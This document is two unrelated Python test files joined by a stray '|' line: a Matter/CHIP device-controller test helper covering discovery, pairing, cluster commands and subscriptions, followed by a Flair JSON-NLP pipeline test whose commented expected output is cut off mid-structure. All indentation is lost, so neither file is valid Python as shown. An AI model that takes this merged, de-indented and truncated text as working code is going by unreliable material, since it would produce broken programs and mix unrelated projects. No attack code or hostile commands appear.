# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dataclasses import dataclass
from typing import Any
import typing
from chip import ChipDeviceCtrl
from chip import ChipCommissionableNodeCtrl
import chip.interaction_model as IM
import threading
import os
import sys
import logging
import time
import ctypes
logger = logging.getLogger('PythonMatterControllerTEST')
logger.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setFormatter(
logging.Formatter(
'%(asctime)s [%(name)s] %(levelname)s %(message)s'))
sh.setStream(sys.stdout)
logger.addHandler(sh)
def TestFail(message):
logger.fatal("Testfail: {}".format(message))
os._exit(1)
def FailIfNot(cond, message):
if not cond:
TestFail(message)
class TestTimeout(threading.Thread):
def __init__(self, timeout: int):
threading.Thread.__init__(self)
self._timeout = timeout
self._should_stop = False
self._cv = threading.Condition()
def stop(self):
with self._cv:
self._should_stop = True
self._cv.notify_all()
self.join()
def run(self):
stop_time = time.time() + self._timeout
logger.info("Test timeout set to {} seconds".format(self._timeout))
with self._cv:
wait_time = stop_time - time.time()
while wait_time > 0 and not self._should_stop:
self._cv.wait(wait_time)
wait_time = stop_time - time.time()
if time.time() > stop_time:
TestFail("Timeout")
class TestResult:
def __init__(self, operationName, result):
self.operationName = operationName
self.result = result
def assertStatusEqual(self, expected):
if self.result is None:
raise Exception(f"{self.operationName}: no result got")
if self.result.status != expected:
raise Exception(
f"{self.operationName}: expected status {expected}, got {self.result.status}")
return self
def assertValueEqual(self, expected):
self.assertStatusEqual(0)
if self.result is None:
raise Exception(f"{self.operationName}: no result got")
if self.result.value != expected:
raise Exception(
f"{self.operationName}: expected value {expected}, got {self.result.value}")
return self
class BaseTestHelper:
def __init__(self, nodeid: int):
self.devCtrl = ChipDeviceCtrl.ChipDeviceController(
controllerNodeId=nodeid)
self.logger = logger
self.commissionableNodeCtrl = ChipCommissionableNodeCtrl.ChipCommissionableNodeController()
def _WaitForOneDiscoveredDevice(self, timeoutSeconds: int = 2):
print("Waiting for device responses...")
strlen = 100
addrStrStorage = ctypes.create_string_buffer(strlen)
timeout = time.time() + timeoutSeconds
while (not self.devCtrl.GetIPForDiscoveredDevice(0, addrStrStorage, strlen) and time.time() <= timeout):
time.sleep(0.2)
if time.time() > timeout:
return None
return ctypes.string_at(addrStrStorage)
def TestDiscovery(self, discriminator: int):
self.logger.info(
f"Discovering commissionable nodes with discriminator {discriminator}")
self.devCtrl.DiscoverCommissionableNodesLongDiscriminator(
ctypes.c_uint16(int(discriminator)))
res = self._WaitForOneDiscoveredDevice()
if not res:
self.logger.info(
f"Device not found")
return False
self.logger.info(f"Found device at {res}")
return res
def TestKeyExchange(self, ip: str, setuppin: int, nodeid: int):
self.logger.info("Conducting key exchange with device {}".format(ip))
if not self.devCtrl.ConnectIP(ip.encode("utf-8"), setuppin, nodeid):
self.logger.info(
"Failed to finish key exchange with device {}".format(ip))
return False
self.logger.info("Device finished key exchange.")
return True
def TestCloseSession(self, nodeid: int):
self.logger.info(f"Closing sessions with device {nodeid}")
try:
self.devCtrl.CloseSession(nodeid)
return True
except Exception as ex:
self.logger.exception(
f"Failed to close sessions with device {nodeid}: {ex}")
return False
def TestNetworkCommissioning(self, nodeid: int, endpoint: int, group: int, dataset: str, network_id: str):
self.logger.info("Commissioning network to device {}".format(nodeid))
try:
self.devCtrl.ZCLSend("NetworkCommissioning", "AddThreadNetwork", nodeid, endpoint, group, {
"operationalDataset": bytes.fromhex(dataset),
"breadcrumb": 0,
"timeoutMs": 1000}, blocking=True)
except Exception as ex:
self.logger.exception("Failed to send AddThreadNetwork command")
return False
self.logger.info(
"Send EnableNetwork command to device {}".format(nodeid))
try:
self.devCtrl.ZCLSend("NetworkCommissioning", "EnableNetwork", nodeid, endpoint, group, {
"networkID": bytes.fromhex(network_id),
"breadcrumb": 0,
"timeoutMs": 1000}, blocking=True)
except Exception as ex:
self.logger.exception("Failed to send EnableNetwork command")
return False
return True
def TestOnOffCluster(self, nodeid: int, endpoint: int, group: int):
self.logger.info(
"Sending On/Off commands to device {} endpoint {}".format(nodeid, endpoint))
err, resp = self.devCtrl.ZCLSend("OnOff", "On", nodeid,
endpoint, group, {}, blocking=True)
if err != 0 or resp is None or resp.Status != 0:
self.logger.error(
"failed to send OnOff.On: error is {} with im response{}".format(err, resp))
return False
err, resp = self.devCtrl.ZCLSend("OnOff", "Off", nodeid,
endpoint, group, {}, blocking=True)
if err != 0 or resp is None or resp.Status != 0:
self.logger.error(
"failed to send OnOff.Off: error is {} with im response {}".format(err, resp))
return False
return True
def TestLevelControlCluster(self, nodeid: int, endpoint: int, group: int):
self.logger.info(
f"Sending MoveToLevel command to device {nodeid} endpoint {endpoint}")
try:
commonArgs = dict(transitionTime=0, optionMask=0, optionOverride=0)
# Move to 0
self.devCtrl.ZCLSend("LevelControl", "MoveToLevel", nodeid,
endpoint, group, dict(**commonArgs, level=0), blocking=True)
res = self.devCtrl.ZCLReadAttribute(cluster="LevelControl",
attribute="CurrentLevel",
nodeid=nodeid,
endpoint=endpoint,
groupid=group)
TestResult("Read attribute LevelControl.CurrentLevel",
res).assertValueEqual(0)
# Move to 255
self.devCtrl.ZCLSend("LevelControl", "MoveToLevel", nodeid,
endpoint, group, dict(**commonArgs, level=255), blocking=True)
res = self.devCtrl.ZCLReadAttribute(cluster="LevelControl",
attribute="CurrentLevel",
nodeid=nodeid,
endpoint=endpoint,
groupid=group)
TestResult("Read attribute LevelControl.CurrentLevel",
res).assertValueEqual(255)
return True
except Exception as ex:
self.logger.exception(f"Level cluster test failed: {ex}")
return False
def TestResolve(self, nodeid):
self.logger.info(
"Resolve: node id = {:08x}".format(nodeid))
try:
self.devCtrl.ResolveNode(nodeid=nodeid)
addr = self.devCtrl.GetAddressAndPort(nodeid)
if not addr:
return False
self.logger.info(f"Resolved address: {addr[0]}:{addr[1]}")
return True
except Exception as ex:
self.logger.exception("Failed to resolve. {}".format(ex))
return False
def TestReadBasicAttributes(self, nodeid: int, endpoint: int, group: int):
basic_cluster_attrs = {
"VendorName": "TEST_VENDOR",
"VendorID": 9050,
"ProductName": "TEST_PRODUCT",
"ProductID": 65279,
"UserLabel": "",
"Location": "",
"HardwareVersion": 0,
"HardwareVersionString": "TEST_VERSION",
"SoftwareVersion": 0,
"SoftwareVersionString": "prerelease",
}
failed_zcl = {}
for basic_attr, expected_value in basic_cluster_attrs.items():
try:
res = self.devCtrl.ZCLReadAttribute(cluster="Basic",
attribute=basic_attr,
nodeid=nodeid,
endpoint=endpoint,
groupid=group)
TestResult(f"Read attribute {basic_attr}", res).assertValueEqual(
expected_value)
except Exception as ex:
failed_zcl[basic_attr] = str(ex)
if failed_zcl:
self.logger.exception(f"Following attributes failed: {failed_zcl}")
return False
return True
def TestWriteBasicAttributes(self, nodeid: int, endpoint: int, group: int):
@dataclass
class AttributeWriteRequest:
cluster: str
attribute: str
value: Any
expected_status: IM.Status = IM.Status.Success
requests = [
AttributeWriteRequest("Basic", "UserLabel", "Test"),
AttributeWriteRequest("Basic", "Location",
"a pretty loooooooooooooog string", IM.Status.InvalidValue),
]
failed_zcl = []
for req in requests:
try:
res = self.devCtrl.ZCLWriteAttribute(cluster=req.cluster,
attribute=req.attribute,
nodeid=nodeid,
endpoint=endpoint,
groupid=group,
value=req.value)
TestResult(f"Write attribute {req.cluster}.{req.attribute}", res).assertStatusEqual(
req.expected_status)
if req.expected_status != IM.Status.Success:
# If the write interaction is expected to success, proceed to verify it.
continue
res = self.devCtrl.ZCLReadAttribute(
cluster=req.cluster, attribute=req.attribute, nodeid=nodeid, endpoint=endpoint, groupid=group)
TestResult(f"Read attribute {req.cluster}.{req.attribute}", res).assertValueEqual(
req.value)
except Exception as ex:
failed_zcl.append(str(ex))
if failed_zcl:
self.logger.exception(f"Following attributes failed: {failed_zcl}")
return False
return True
def TestSubscription(self, nodeid: int, endpoint: int):
class _subscriptionHandler(IM.OnSubscriptionReport):
def __init__(self, path: IM.AttributePath, logger: logging.Logger):
super(_subscriptionHandler, self).__init__()
self.subscriptionReceived = 0
self.path = path
self.countLock = threading.Lock()
self.cv = threading.Condition(self.countLock)
self.logger = logger
def OnData(self, path: IM.AttributePath, subscriptionId: int, data: typing.Any) -> None:
if path != self.path:
return
logger.info(
f"Received report from server: path: {path}, value: {data}, subscriptionId: {subscriptionId}")
with self.countLock:
self.subscriptionReceived += 1
self.cv.notify_all()
class _conductAttributeChange(threading.Thread):
def __init__(self, devCtrl: ChipDeviceCtrl.ChipDeviceController, nodeid: int, endpoint: int):
super(_conductAttributeChange, self).__init__()
self.nodeid = nodeid
self.endpoint = endpoint
self.devCtrl = devCtrl
def run(self):
for i in range(5):
time.sleep(3)
self.devCtrl.ZCLSend(
"OnOff", "Toggle", self.nodeid, self.endpoint, 0, {})
try:
subscribedPath = IM.AttributePath(
nodeId=nodeid, endpointId=endpoint, clusterId=6, attributeId=0)
# OnOff Cluster, OnOff Attribute
handler = _subscriptionHandler(subscribedPath, self.logger)
IM.SetAttributeReportCallback(subscribedPath, handler)
self.devCtrl.ZCLSubscribeAttribute(
"OnOff", "OnOff", nodeid, endpoint, 1, 10)
changeThread = _conductAttributeChange(
self.devCtrl, nodeid, endpoint)
# Reset the number of subscriptions received as subscribing causes a callback.
handler.subscriptionReceived = 0
changeThread.start()
with handler.cv:
while handler.subscriptionReceived < 5:
# We should observe 10 attribute changes
handler.cv.wait()
changeThread.join()
return True
except Exception as ex:
self.logger.exception(f"Failed to finish API test: {ex}")
return False
return True
def TestNonControllerAPIs(self):
'''
This function validates various APIs provided by chip package which is not related to controller.
TODO: Add more tests for APIs
'''
try:
cluster = self.devCtrl.GetClusterHandler()
clusterInfo = cluster.GetClusterInfoById(0x50F) # TestCluster
if clusterInfo["clusterName"] != "TestCluster":
raise Exception(
f"Wrong cluster info clusterName: {clusterInfo['clusterName']} expected TestCluster")
except Exception as ex:
self.logger.exception(f"Failed to finish API test: {ex}")
return False
return True
|
from collections import OrderedDict
from unittest import TestCase
from pyjsonnlp import validation
from flairjsonnlp import FlairPipeline
from . import mocks
import pytest
text = "Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash."
def strip_scores(j):
"""Scores are non-deterministic"""
for s in j['documents'][1]['sentences']:
for label in s.get('labels', []):
label['scores']['label'] = 0
for e in j['documents'][1]['expressions']:
e['scores']['type'] = 0
for t in j['documents'][1]['tokenList']:
t['scores']['upos'] = 0
t['scores']['xpos'] = 0
t['scores']['entity'] = 0
if 'synsets' in t:
t['synsets'][0]['scores']['wordnetId'] = 0
class TestFlair(TestCase):
def test_process(self):
actual = FlairPipeline().process(text, fast=False, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'crash.v.01', 'scores': {'wordnetId': 0}}]}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_fast(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': '.', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_ontonotes(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=True)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-GPE', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 